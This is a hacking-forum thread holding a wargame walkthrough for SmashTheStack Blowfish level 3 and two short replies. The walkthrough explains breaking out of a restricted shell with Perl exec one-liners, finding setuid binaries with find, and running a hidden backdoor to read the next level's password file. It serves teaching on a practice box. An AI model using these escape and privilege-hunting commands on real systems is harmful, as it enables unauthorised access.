iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (1)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
[STS]Level 3 - Blowfish
  • chroniccommand
    Posts: 1,389
    Here is part 3 to my STS mission tutorials.

    Part 1
    So now you must login to level 3 with the password acquired from the last level(Finding the backdoor). To connect to level three, use this command:
    ssh level3@blowfish.smashthestack.org -p 2222

    This will ask for the password. Just put in the password you got from the last level and you should get a connection. The login banner should look like this:

    $ssh level3@blowfish.smashthestack.org -p 2222
    password: 

     1. Thou shalt NOT root or otherwise harm the box.
         2. Thou shalt NOT access any other network from this box.
         3. Thou shalt NOT use any other directory besides /tmp or /code for code. 
         4. Thou shalt give the root pass to l3thal if you manage to change it.

         Passwords are in /pass.
         There is a README in each users home directory.
         /tmp && /var/tmp will be flushed daily by cron.
         Use /code plz for umm, code ;D
         IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
         The password for the last level will get you into
         Tux, the more advanced wargame. Join #blowfish on 
         irc.smashthestack.org with any questions. 

         Admins - l3thal && cr 

         Forum: http://smashthestack.org/viewforum.php?id=10

    Last login: Fri Jan 29 14:32:54 2010 from indio.cespi.unlp.edu.ar

    You are in a restricted shell. If you can break out of it, you need to find the backdoor hidden somewhere in the system. find it and cat /pass/level4

    So as you read, it says you're in a restricted shell. You must break out of it by finding yet another backdoor.

    Part 2 - Using what's at your fingertips
    So now we need to find that backdoor and break out again, to cat /pass/level4. To do this we need to find out what's at our fingertips and what we can use in this box. Lets see what's installed and what we can use. If we play around with some stuff such as python and perl, you can see that Perl is installed on the box. That's great because you can issue some commands through Perl with the command line functions.
    To issue commands with Perl through the command line, you would type something like this:
    perl -e \"Functions_Here\"

    This will execute the code with the -e command. So now we want to test it. Try this:
    perl -e \"print exec('/usr/bin/id')\"

    This will execute /usr/bin/id which will print out your ID in the terminal. So now that we can execute commands through perl, we need to find that damn backdoor. Try this command:
    perl -e \"print exec('/usr/bin/find / -perm -4000 -executable')\"

    If you paid attention to the last tutorial, we are execute /usr/bin/find (The find command) and looking for executables with the suid flag on(4000). We issue this by using the "perl -e "print exec()"" function. Print exec() will execute what we need to do. So after executing that we should get something like this:

    /usr/bin/find: `/root': Permission denied
    /home/level3/..     /cat_lvl4
    /bin/su
    /bin/ping6
    /bin/mount
    /bin/umount
    /usr/bin/false
    /usr/bin/newgrp
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/pt_chown

    This is listing everything. Now you should see something that looks peculiar. We need to execute this with Perl. Take a look at this command:
    perl -e \"print exec('/home/level3/..\ \ \ \ \ /#####')\"

    NOTE: I blanked out the code to execute so you actually take your time to find it :P
    Now if we take a look at this we are executing the command that we found with the find command. We do the \ \ \ \ to escape the spaces of the directory and it will execute the backdoor we found with the "/usr/bin/find" command. This is all for this tutorial :)
    The next tutorial is your first Buffer OverFlow of the SmashTheStack missions :D how fun. Stay tuned for it.

    --Chroniccommand
  • Xin
    Posts: 3,251
    Great tutorial chronic! :) good job
    Xin
  • chroniccommand
    Posts: 1,389
    said:


    Great tutorial chronic! :) good job



    Thanks I worked hard on it.
  • Xin
    Posts: 3,251
    Yeah keep these tutorials coming as i like these ones inparticular xD
    Xin
Add a Comment